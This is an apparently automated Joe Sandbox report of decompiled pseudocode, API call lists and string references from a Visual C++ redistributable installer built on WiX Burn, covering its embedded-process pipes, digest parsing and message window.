				char _v36;
				intOrPtr _v44;
				void* _v48;
				long _v52;
				char _v56;
				void _v60;
				int _v64;
				char _v68;
				struct _STARTUPINFOW _v136;
				void* __ebx;
				void* __edi;
				signed short _t92;
				long _t95;
				signed int _t96;
				void* _t100;
				void* _t101;
				void* _t110;

				_t100 = __edx;
				_t95 = GetCurrentProcessId();
				_v8 = 0;
				_v12 = 0;
				E0003F670(_t101,  &_v136, 0, 0x44);
				_v68 = 0;
				_v64 = 0;
				asm("stosd");
				asm("stosd");
				_t96 = 6;
				asm("stosd");
				asm("stosd");
				memset( &_v60, 0, _t96 << 2);
				E00024B0E( &_v60);
				_v36 = _a12;
				_v32 = _a16;
				if(E00024B96(_t95, _t100,  &_v60,  &_v56) >= 0) {
					if(E00024CE8( &_v60, 0,  &_v8) >= 0) {
						_push(_t95);
						_push(_v56);
						_push(_v60);
						_push(L"burn.embedded");
						if(E00011F62( &_v12, L"%ls -%ls %ls %ls %u", _a8) >= 0) {
							if(CreateProcessW(_a4, _v12, 0, 0, 1, 0x8000000, 0, 0,  &_v136,  &_v28) != 0) {
								_v52 = GetProcessId(_v28.hProcess);
								_v28.hProcess = _v28.hProcess & 0x00000000;
								_v48 = _v28.hProcess;
								_t110 = E000252E3( &_v60);
								if(_t110 >= 0) {
									_t110 = E00024FB3(0, _t100, _v44, E0003C992,  &_v36,  &_v68);
									if(_t110 >= 0) {
										_t110 = E00050917(0, _v48, 0xffffffff, _a20);
										if(_t110 < 0) {
											_push(_a4);
											_push("Failed to wait for embedded executable: %ls");
											goto L15;
										}
									} else {
										_push("Failed to process messages from embedded message.");
										goto L2;
									}
								} else {
									_push("Failed to wait for embedded process to connect to pipe.");
									goto L2;
								}
							} else {
								_t92 = GetLastError();
								_t113 =  <=  ? _t92 : _t92 & 0x0000ffff | 0x80070000;
								_t110 =  >=  ? 0x80004005 :  <=  ? _t92 : _t92 & 0x0000ffff | 0x80070000;
								E000137D3(0x80004005, "embedded.cpp", 0x4c, _t110);
								_push(_a4);
								_push("Failed to create embedded process at path: %ls");
								L15:
								_push(_t110);
								E0005012F();
							}
						} else {
							_push("Failed to allocate embedded command.");
							goto L2;
						}
					} else {
						_push("Failed to create embedded pipe.");
						goto L2;
					}
				} else {
					_push("Failed to create embedded pipe name and client token.");
					L2:
					_push(_t110);
					E0005012F();
				}
				if(_v28.hThread != 0) {
					CloseHandle(_v28.hThread);
					_v28.hThread = _v28.hThread & 0x00000000;
				}
				if(_v28.hProcess != 0) {
					CloseHandle(_v28.hProcess);
					_v28.hProcess = _v28 & 0x00000000;
				}
				E00012793(_v12);
				if(_v8 != 0) {
					CloseHandle(_v8);
					_v8 = _v8 & 0x00000000;
				}
				E00024B2B( &_v60);
				return _t110;
			}
























                                                                          0x0003ca34
                                                                          0x0003ca48
                                                                          0x0003ca52
                                                                          0x0003ca57
                                                                          0x0003ca5a
                                                                          0x0003ca61
                                                                          0x0003ca67
                                                                          0x0003ca6a
                                                                          0x0003ca6e
                                                                          0x0003ca71
                                                                          0x0003ca72
                                                                          0x0003ca73
                                                                          0x0003ca79
                                                                          0x0003ca7f
                                                                          0x0003ca87
                                                                          0x0003ca8d
                                                                          0x0003caa1
                                                                          0x0003cac8
                                                                          0x0003cad1
                                                                          0x0003cad2
                                                                          0x0003cad8
                                                                          0x0003cadb
                                                                          0x0003caf5
                                                                          0x0003cb26
                                                                          0x0003cb66
                                                                          0x0003cb6c
                                                                          0x0003cb70
                                                                          0x0003cb7c
                                                                          0x0003cb80
                                                                          0x0003cba1
                                                                          0x0003cba5
                                                                          0x0003cbbe
                                                                          0x0003cbc2
                                                                          0x0003cbc4
                                                                          0x0003cbc7
                                                                          0x00000000
                                                                          0x0003cbc7
                                                                          0x0003cba7
                                                                          0x0003cba7
                                                                          0x00000000
                                                                          0x0003cba7
                                                                          0x0003cb82
                                                                          0x0003cb82
                                                                          0x00000000
                                                                          0x0003cb82
                                                                          0x0003cb28
                                                                          0x0003cb28
                                                                          0x0003cb39
                                                                          0x0003cb43
                                                                          0x0003cb4e
                                                                          0x0003cb53
                                                                          0x0003cb56
                                                                          0x0003cbcc
                                                                          0x0003cbcc
                                                                          0x0003cbcd
                                                                          0x0003cbd2
                                                                          0x0003caf7
                                                                          0x0003caf7
                                                                          0x00000000
                                                                          0x0003caf7
                                                                          0x0003caca
                                                                          0x0003caca
                                                                          0x00000000
                                                                          0x0003caca
                                                                          0x0003caa3
                                                                          0x0003caa3
                                                                          0x0003caa8
                                                                          0x0003caa8
                                                                          0x0003caa9
                                                                          0x0003caaf
                                                                          0x0003cbdf
                                                                          0x0003cbe4
                                                                          0x0003cbe6
                                                                          0x0003cbe6
                                                                          0x0003cbee
                                                                          0x0003cbf3
                                                                          0x0003cbf5
                                                                          0x0003cbf5
                                                                          0x0003cbfc
                                                                          0x0003cc05
                                                                          0x0003cc0a
                                                                          0x0003cc0c
                                                                          0x0003cc0c
                                                                          0x0003cc14
                                                                          0x0003cc21

                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(746561D0,00000002,00000000), ref: 0003CA40
                                                                            • Part of subcall function 00024B96: UuidCreate.RPCRT4(?), ref: 00024BC9
                                                                          • CreateProcessW.KERNEL32 ref: 0003CB1E
                                                                          • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 0003CB28
                                                                          • GetProcessId.KERNEL32(000321A5,?,?,00000000,?,?,?,?), ref: 0003CB60
                                                                            • Part of subcall function 000252E3: lstrlenW.KERNEL32(?,?,00000000,?,0005B4F0,?,00000000,?,0001442A,?,0005B4F0), ref: 00025304
                                                                            • Part of subcall function 000252E3: GetCurrentProcessId.KERNEL32(?,0001442A,?,0005B4F0), ref: 0002530F
                                                                            • Part of subcall function 000252E3: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0001442A,?,0005B4F0), ref: 00025346
                                                                            • Part of subcall function 000252E3: ConnectNamedPipe.KERNEL32(?,00000000,?,0001442A,?,0005B4F0), ref: 0002535B
                                                                            • Part of subcall function 000252E3: GetLastError.KERNEL32(?,0001442A,?,0005B4F0), ref: 00025365
                                                                            • Part of subcall function 000252E3: Sleep.KERNEL32(00000064,?,0001442A,?,0005B4F0), ref: 00025396
                                                                            • Part of subcall function 000252E3: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0001442A,?,0005B4F0), ref: 000253B9
                                                                            • Part of subcall function 000252E3: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0001442A,?,0005B4F0), ref: 000253D4
                                                                            • Part of subcall function 000252E3: WriteFile.KERNEL32(?,0001442A,0005B4F0,00000000,00000000,?,0001442A,?,0005B4F0), ref: 000253EF
                                                                            • Part of subcall function 000252E3: WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0001442A,?,0005B4F0), ref: 0002540A
                                                                            • Part of subcall function 00050917: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00014E16,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00050927
                                                                            • Part of subcall function 00050917: GetLastError.KERNEL32(?,?,00014E16,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00050935
                                                                          • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0003C992,?,?,?,?,?,00000000,?,?,?,?), ref: 0003CBE4
                                                                          • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0003C992,?,?,?,?,?,00000000,?,?,?,?), ref: 0003CBF3
                                                                          • CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,0003C992,?,?,?,?,?,00000000,?,?,?), ref: 0003CC0A
                                                                          Strings
                                                                          • Failed to wait for embedded process to connect to pipe., xrefs: 0003CB82
                                                                          • Failed to create embedded pipe name and client token., xrefs: 0003CAA3
                                                                          • Failed to allocate embedded command., xrefs: 0003CAF7
                                                                          • embedded.cpp, xrefs: 0003CB49
                                                                          • burn.embedded, xrefs: 0003CADB
                                                                          • %ls -%ls %ls %ls %u, xrefs: 0003CAE3
                                                                          • Failed to create embedded pipe., xrefs: 0003CACA
                                                                          • Failed to process messages from embedded message., xrefs: 0003CBA7
                                                                          • Failed to wait for embedded executable: %ls, xrefs: 0003CBC7
                                                                          • Failed to create embedded process at path: %ls, xrefs: 0003CB56
                                                                          • @Met, xrefs: 0003CB28
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
                                                                          • String ID: %ls -%ls %ls %ls %u$@Met$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
                                                                          • API String ID: 875070380-134372444
                                                                          • Opcode ID: f8ebd885f4740b69e85b246fc47015effb70d65b7dd809845e1e31ba9adac0ce
                                                                          • Instruction ID: ac8b50dd1ab3c0a3501ff2b3e1608da7b2e242afec8e0a1ebcaac624ce248936
                                                                          • Opcode Fuzzy Hash: f8ebd885f4740b69e85b246fc47015effb70d65b7dd809845e1e31ba9adac0ce
                                                                          • Instruction Fuzzy Hash: 2F516D72D40629BBEF22EBA4DC06FDEBBB8AB04711F104121FA04F6191D7759A448BD5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00024933 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 155sleepfileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 46%
                                                                          			E00024933(void* __ebx, void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t23;
				void* _t33;
				long _t41;
				long* _t42;
				intOrPtr* _t50;
				void* _t53;
				void* _t54;
				void* _t65;
				void* _t66;

				_v8 = _v8 & 0x00000000;
				_t50 = _a4;
				_t53 = E00011F20( &_v8, L"\\\\.\\pipe\\%ls",  *_t50);
				_t66 = _t65 + 0xc;
				if(_t53 >= 0) {
					_t54 = 0x8000ffff;
					_t41 = 0;
					while(_t41 < 0x708) {
						_t21 = CreateFileW(_v8, 0xc0000000, 0, 0, 3, 0, 0);
						 *(_t50 + 0x10) = _t21;
						if(_t21 != 0xffffffff) {
							_t54 = 0;
						} else {
							_t64 =  <=  ? GetLastError() : _t38 & 0x0000ffff | 0x80070000;
							_t21 = 0x800705b4;
							_t54 =  ==  ? 0x800705b4 :  <=  ? GetLastError() : _t38 & 0x0000ffff | 0x80070000;
							Sleep(0x64);
						}
						_t41 = _t41 + 1;
						if(_t54 < 0) {
							continue;
						}
						break;
					}
					if(_t54 >= 0) {
						_t42 = _t50 + 8;
						_t53 = E000244E7( *(_t50 + 0x10),  *((intOrPtr*)(_t50 + 4)), _t42);
						if(_t53 >= 0) {
							if(_a8 == 0) {
								L19:
								_t23 = OpenProcess(0x100000, 0,  *_t42);
								 *(_t50 + 0xc) = _t23;
								if(_t23 == 0) {
									_t58 =  <=  ? GetLastError() : _t26 & 0x0000ffff | 0x80070000;
									_t53 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t26 & 0x0000ffff | 0x80070000;
									E000137D3(0x80004005, "pipe.cpp", 0x2a0, _t53);
									_push( *_t42);
									_push("Failed to open companion process with PID: %u");
									goto L21;
								}
							} else {
								_t53 = E00011F20( &_v8, L"\\\\.\\pipe\\%ls.Cache",  *_t50);
								_t66 = _t66 + 0xc;
								if(_t53 >= 0) {
									_t33 = CreateFileW(_v8, 0xc0000000, 0, 0, 3, 0, 0);
									 *(_t50 + 0x14) = _t33;
									if(_t33 != 0xffffffff) {
										_t53 = E000244E7(_t33,  *((intOrPtr*)(_t50 + 4)), _t42);
										if(_t53 < 0) {
											goto L12;
										} else {
											goto L19;
										}
									} else {
										_t61 =  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
										_t21 = 0x80004005;
										_t53 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t35 & 0x0000ffff | 0x80070000;
										_push(_t53);
										_push(0x297);
										goto L10;
									}
								} else {
									_push("Failed to allocate name of parent cache pipe.");
									_push(_t53);
									E0005012F();
								}
							}
						} else {
							L12:
							_push(_v8);
							_push("Failed to verify parent pipe: %ls");
							goto L21;
						}
					} else {
						_push(_t54);
						_push(0x288);
						L10:
						_push("pipe.cpp");
						E000137D3(_t21);
						_push(_v8);
						_push("Failed to open parent pipe: %ls");
						L21:
						_push(_t53);
						E0005012F();
					}
				} else {
					_push("Failed to allocate name of parent pipe.");
					_push(_t53);
					E0005012F();
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t53;
			}













                                                                          0x00024937
                                                                          0x00024940
                                                                          0x00024950
                                                                          0x00024952
                                                                          0x00024957
                                                                          0x0002496c
                                                                          0x00024971
                                                                          0x00024973
                                                                          0x0002498d
                                                                          0x00024993
                                                                          0x00024999
                                                                          0x000249c7
                                                                          0x0002499b
                                                                          0x000249ae
                                                                          0x000249b1
                                                                          0x000249bc
                                                                          0x000249bf
                                                                          0x000249bf
                                                                          0x000249c9
                                                                          0x000249cc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000249cc
                                                                          0x000249d0
                                                                          0x000249ef
                                                                          0x000249fe
                                                                          0x00024a02
                                                                          0x00024a15
                                                                          0x00024aa1
                                                                          0x00024aaa
                                                                          0x00024ab0
                                                                          0x00024ab5
                                                                          0x00024ac8
                                                                          0x00024ad2
                                                                          0x00024ae0
                                                                          0x00024ae5
                                                                          0x00024ae7
                                                                          0x00000000
                                                                          0x00024ae7
                                                                          0x00024a1b
                                                                          0x00024a2b
                                                                          0x00024a2d
                                                                          0x00024a32
                                                                          0x00024a56
                                                                          0x00024a5c
                                                                          0x00024a62
                                                                          0x00024a97
                                                                          0x00024a9b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00024a64
                                                                          0x00024a75
                                                                          0x00024a78
                                                                          0x00024a7f
                                                                          0x00024a82
                                                                          0x00024a83
                                                                          0x00000000
                                                                          0x00024a83
                                                                          0x00024a34
                                                                          0x00024a34
                                                                          0x00024a39
                                                                          0x00024a3a
                                                                          0x00024a40
                                                                          0x00024a32
                                                                          0x00024a04
                                                                          0x00024a04
                                                                          0x00024a04
                                                                          0x00024a07
                                                                          0x00000000
                                                                          0x00024a07
                                                                          0x000249d2
                                                                          0x000249d2
                                                                          0x000249d3
                                                                          0x000249d8
                                                                          0x000249d8
                                                                          0x000249dd
                                                                          0x000249e2
                                                                          0x000249e5
                                                                          0x00024aec
                                                                          0x00024aec
                                                                          0x00024aed
                                                                          0x00024af2
                                                                          0x00024959
                                                                          0x00024959
                                                                          0x0002495e
                                                                          0x0002495f
                                                                          0x00024965
                                                                          0x00024afa
                                                                          0x00024aff
                                                                          0x00024aff
                                                                          0x00024b0b

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 0002498D
                                                                          • GetLastError.KERNEL32 ref: 0002499B
                                                                          • Sleep.KERNEL32(00000064), ref: 000249BF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorFileLastSleep
                                                                          • String ID: @Met$Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
                                                                          • API String ID: 408151869-519052952
                                                                          • Opcode ID: 56ec43d3978ddf5f4c0c2868887e552ba2c1dd32eb48daae612b7625fbdf5fb4
                                                                          • Instruction ID: 2cc2ac6970fd42bd4d1015b21278a049543ba2a76c86f2d41f685eea37ced474
                                                                          • Opcode Fuzzy Hash: 56ec43d3978ddf5f4c0c2868887e552ba2c1dd32eb48daae612b7625fbdf5fb4
                                                                          • Instruction Fuzzy Hash: 79412832E80731BBEB216BA4EC06BAFB698AF00721F110221FE01FA1D1D7759D5096D5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00057E36 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 153stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 88%
                                                                          			E00057E36(int __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _t42;
				intOrPtr _t44;
				intOrPtr _t47;
				short** _t53;
				intOrPtr _t54;
				int _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				short* _t58;

				_t55 = __ecx;
				_t56 = _a8;
				_t53 =  *(_a4 + 0x24);
				while(_t53 != 0) {
					if(CompareStringW(0x7f, 0,  *_t53, 0xffffffff, L"http://appsyndication.org/2006/appsyn", 0xffffffff) != 2) {
						L5:
						_t8 =  &(_t53[4]); // 0x650076
						_t53 =  *_t8;
						continue;
					}
					_t4 =  &(_t53[1]); // 0x2e0069
					if(CompareStringW(0x7f, 0, L"digest", 0xffffffff,  *_t4, 0xffffffff) == 2) {
						_t19 =  &(_t53[3]); // 0x6c
						_t58 =  *_t19;
						while(_t58 != 0) {
							if(CompareStringW(0x7f, 0, L"algorithm", 0xffffffff, _t58[2], 0xffffffff) == 2) {
								if(CompareStringW(0x7f, 1, L"md5", 0xffffffff, _t58[4], 0xffffffff) != 2) {
									_t42 = CompareStringW(0x7f, 1, L"sha1", 0xffffffff, _t58[4], 0xffffffff);
									_t55 = 2;
									if(_t42 == _t55) {
										 *(_t56 + 0x18) = _t55;
									}
								} else {
									 *(_t56 + 0x18) = 1;
								}
								if(CompareStringW(0x7f, 1, L"sha256", 0xffffffff, _t58[4], 0xffffffff) == 2) {
									 *(_t56 + 0x18) = 3;
								}
								L21:
								if( *(_t56 + 0x18) != 3) {
									_t44 = 0x8007000d;
									_push(0x8007000d);
									_push(0x17c);
									L24:
									_t57 = _t44;
									L25:
									_push("apuputil.cpp");
									E000137D3(_t44);
									L9:
									return _t57;
								}
								_t29 =  &(_t53[2]); // 0x6c0064
								if(lstrlenW( *_t29) == 0x40) {
									_t47 = 0x20;
									 *((intOrPtr*)(_t56 + 0x14)) = _t47;
									_t44 = E000138D4(_t47, 1);
									 *((intOrPtr*)(_t56 + 0x10)) = _t44;
									if(_t44 != 0) {
										_t33 =  &(_t53[2]); // 0x6c0064
										_t57 = E0001267A(_t55,  *_t33, _t44,  *((intOrPtr*)(_t56 + 0x14)));
										if(_t57 < 0) {
											goto L9;
										}
										goto L7;
									}
									_t57 = 0x8007000e;
									_push(0x8007000e);
									_push(0x174);
									goto L25;
								}
								_t44 = 0x8007000d;
								_push(0x8007000d);
								_push(0x16f);
								goto L24;
							}
							_t58 = _t58[6];
						}
						goto L21;
					}
					_t5 =  &(_t53[1]); // 0x2e0069
					if(CompareStringW(0x7f, 0, L"name", 0xffffffff,  *_t5, 0xffffffff) != 2) {
						goto L5;
					}
					_t6 =  &(_t53[2]); // 0x6c0064
					_t7 = _t56 + 4; // 0x5
					_t57 = E000121A5(_t7,  *_t6, 0);
					if(_t57 < 0) {
						goto L9;
					}
					goto L5;
				}
				L7:
				_t54 = _a4;
				 *((intOrPtr*)(_t56 + 8)) =  *((intOrPtr*)(_t54 + 0x18));
				 *((intOrPtr*)(_t56 + 0xc)) =  *((intOrPtr*)(_t54 + 0x1c));
				_t57 = E000121A5(_t56,  *((intOrPtr*)(_t54 + 0xc)), 0);
				if(_t57 >= 0) {
					 *(_t56 + 0x1c) =  *(_t56 + 0x1c) & 0x00000000;
					 *(_t56 + 4) =  *(_t56 + 4) & 0x00000000;
				}
				goto L9;
			}












                                                                          0x00057e36
                                                                          0x00057e3f
                                                                          0x00057e42
                                                                          0x00057eae
                                                                          0x00057e5f
                                                                          0x00057eab
                                                                          0x00057eab
                                                                          0x00057eab
                                                                          0x00000000
                                                                          0x00057eab
                                                                          0x00057e63
                                                                          0x00057e7a
                                                                          0x00057ee3
                                                                          0x00057ee3
                                                                          0x00057f06
                                                                          0x00057f01
                                                                          0x00057f25
                                                                          0x00057f40
                                                                          0x00057f48
                                                                          0x00057f4b
                                                                          0x00057f4d
                                                                          0x00057f4d
                                                                          0x00057f27
                                                                          0x00057f27
                                                                          0x00057f27
                                                                          0x00057f69
                                                                          0x00057f6b
                                                                          0x00057f6b
                                                                          0x00057f72
                                                                          0x00057f76
                                                                          0x00057fdf
                                                                          0x00057fe4
                                                                          0x00057fe5
                                                                          0x00057f91
                                                                          0x00057f91
                                                                          0x00057f93
                                                                          0x00057f93
                                                                          0x00057f98
                                                                          0x00057edb
                                                                          0x00057ee0
                                                                          0x00057ee0
                                                                          0x00057f78
                                                                          0x00057f84
                                                                          0x00057fa4
                                                                          0x00057fa8
                                                                          0x00057fab
                                                                          0x00057fb0
                                                                          0x00057fb5
                                                                          0x00057fc8
                                                                          0x00057fd0
                                                                          0x00057fd4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00057fda
                                                                          0x00057fb7
                                                                          0x00057fbc
                                                                          0x00057fbd
                                                                          0x00000000
                                                                          0x00057fbd
                                                                          0x00057f86
                                                                          0x00057f8b
                                                                          0x00057f8c
                                                                          0x00000000
                                                                          0x00057f8c
                                                                          0x00057f03
                                                                          0x00057f03
                                                                          0x00000000
                                                                          0x00057f0a
                                                                          0x00057e7e
                                                                          0x00057e95
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00057e99
                                                                          0x00057e9c
                                                                          0x00057ea5
                                                                          0x00057ea9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00057ea9
                                                                          0x00057eb2
                                                                          0x00057eb2
                                                                          0x00057eba
                                                                          0x00057ec0
                                                                          0x00057ecc
                                                                          0x00057ed0
                                                                          0x00057ed2
                                                                          0x00057ed6
                                                                          0x00057ed6
                                                                          0x00000000

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,?,00058320,00000001,?), ref: 00057E56
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,00058320,00000001,?), ref: 00057E71
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,00058320,00000001,?), ref: 00057E8C
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,00058320,00000001,?), ref: 00057EF8
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,00058320,00000001,?), ref: 00057F1C
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,00058320,00000001,?), ref: 00057F40
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,00058320,00000001,?), ref: 00057F60
                                                                          • lstrlenW.KERNEL32(006C0064,?,00058320,00000001,?), ref: 00057F7B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString$lstrlen
                                                                          • String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
                                                                          • API String ID: 1657112622-2492263259
                                                                          • Opcode ID: 8f79f72134d4c4f8af6b7353efbc8856641b88a41e7f08ca86251aa0a44673d5
                                                                          • Instruction ID: 1f82e503f99144e58606aeae211e2b3f5572f549c390b86c266543c161f95fd9
                                                                          • Opcode Fuzzy Hash: 8f79f72134d4c4f8af6b7353efbc8856641b88a41e7f08ca86251aa0a44673d5
                                                                          • Instruction Fuzzy Hash: 1351F431A4C712BBEB208F04DC46F67BA61AB05732F208314FA3DAE2D1C765EC849790
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002E563 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 135registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 78%
                                                                          			E0002E563(signed int _a4) {
				int _v8;
				void _v12;
				struct tagMSG _v40;
				struct _WNDCLASSW _v80;
				int _t35;
				intOrPtr _t37;
				struct HWND__* _t44;
				int _t47;
				signed short _t57;
				signed short _t60;
				void** _t64;
				signed int _t65;
				void* _t77;
				struct HWND__* _t79;

				_t64 = _a4;
				_t65 = 0xa;
				_t79 = 0;
				_t35 = memset( &_v80, 0, _t65 << 2);
				_push(7);
				_v12 = 0;
				memset( &_v40, _t35, 0 << 2);
				_t77 = _t64[2];
				_v8 = 0;
				_t37 =  *((intOrPtr*)(_t77 + 0x490));
				_a4 = 0 | _t37 == 0x00000002;
				if(_t37 != 2 || TlsSetValue( *(_t77 + 0x498),  *(_t77 + 0x4b0)) != 0) {
					_v80.hInstance = _t64[1];
					_v80.lpfnWndProc = E0002E705;
					_v80.lpszClassName = L"WixBurnMessageWindow";
					if(RegisterClassW( &_v80) != 0) {
						_v12 = _a4;
						_v8 = _t77 + 0xb8;
						_t44 = CreateWindowExW(0x80, _v80.lpszClassName, _t79, 0x90000000, 0x80000000, 8, _t79, _t79, _t79, _t79, _t64[1],  &_v12);
						if(_t44 != 0) {
							 *(_t77 + 0x3e0) = _t44;
							SetEvent( *_t64);
							while(1) {
								_t47 = GetMessageW( &_v40, _t79, _t79, _t79);
								if(_t47 == 0) {
									break;
								}
								if(_t47 == 0xffffffff) {
									_t79 = 0x8000ffff;
									_push("Unexpected return value from message pump.");
									L14:
									_push(_t79);
									E0005012F();
									goto L15;
								}
								if(IsDialogMessageW(_v40,  &_v40) == 0) {
									TranslateMessage( &_v40);
									DispatchMessageW( &_v40);
								}
							}
							goto L15;
						}
						_t57 = GetLastError();
						_t82 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
						_t79 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "uithread.cpp", 0x8a, _t79);
						_push("Failed to create window.");
						goto L14;
					}
					_t60 = GetLastError();
					_t85 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
					_t79 =  >=  ? 0x80004005 :  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "uithread.cpp", 0x80, _t79);
					_push("Failed to register window.");
					goto L14;
				} else {
					_t79 = 0x8007139f;
					L15:
					UnregisterClassW(L"WixBurnMessageWindow", _t64[1]);
					return _t79;
				}
			}

















                                                                          0x0002e56a
                                                                          0x0002e573
                                                                          0x0002e577
                                                                          0x0002e579
                                                                          0x0002e57b
                                                                          0x0002e581
                                                                          0x0002e584
                                                                          0x0002e586
                                                                          0x0002e58b
                                                                          0x0002e58e
                                                                          0x0002e59a
                                                                          0x0002e5a0
                                                                          0x0002e5c5
                                                                          0x0002e5cc
                                                                          0x0002e5d3
                                                                          0x0002e5e3
                                                                          0x0002e620
                                                                          0x0002e629
                                                                          0x0002e64c
                                                                          0x0002e654
                                                                          0x0002e68b
                                                                          0x0002e693
                                                                          0x0002e6cb
                                                                          0x0002e6d2
                                                                          0x0002e6d6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002e6a4
                                                                          0x0002e6da
                                                                          0x0002e6df
                                                                          0x0002e6e4
                                                                          0x0002e6e4
                                                                          0x0002e6e5
                                                                          0x00000000
                                                                          0x0002e6eb
                                                                          0x0002e6b5
                                                                          0x0002e6bb
                                                                          0x0002e6c5
                                                                          0x0002e6c5
                                                                          0x0002e6b5
                                                                          0x00000000
                                                                          0x0002e6d8
                                                                          0x0002e656
                                                                          0x0002e667
                                                                          0x0002e671
                                                                          0x0002e67f
                                                                          0x0002e684
                                                                          0x00000000
                                                                          0x0002e684
                                                                          0x0002e5e5
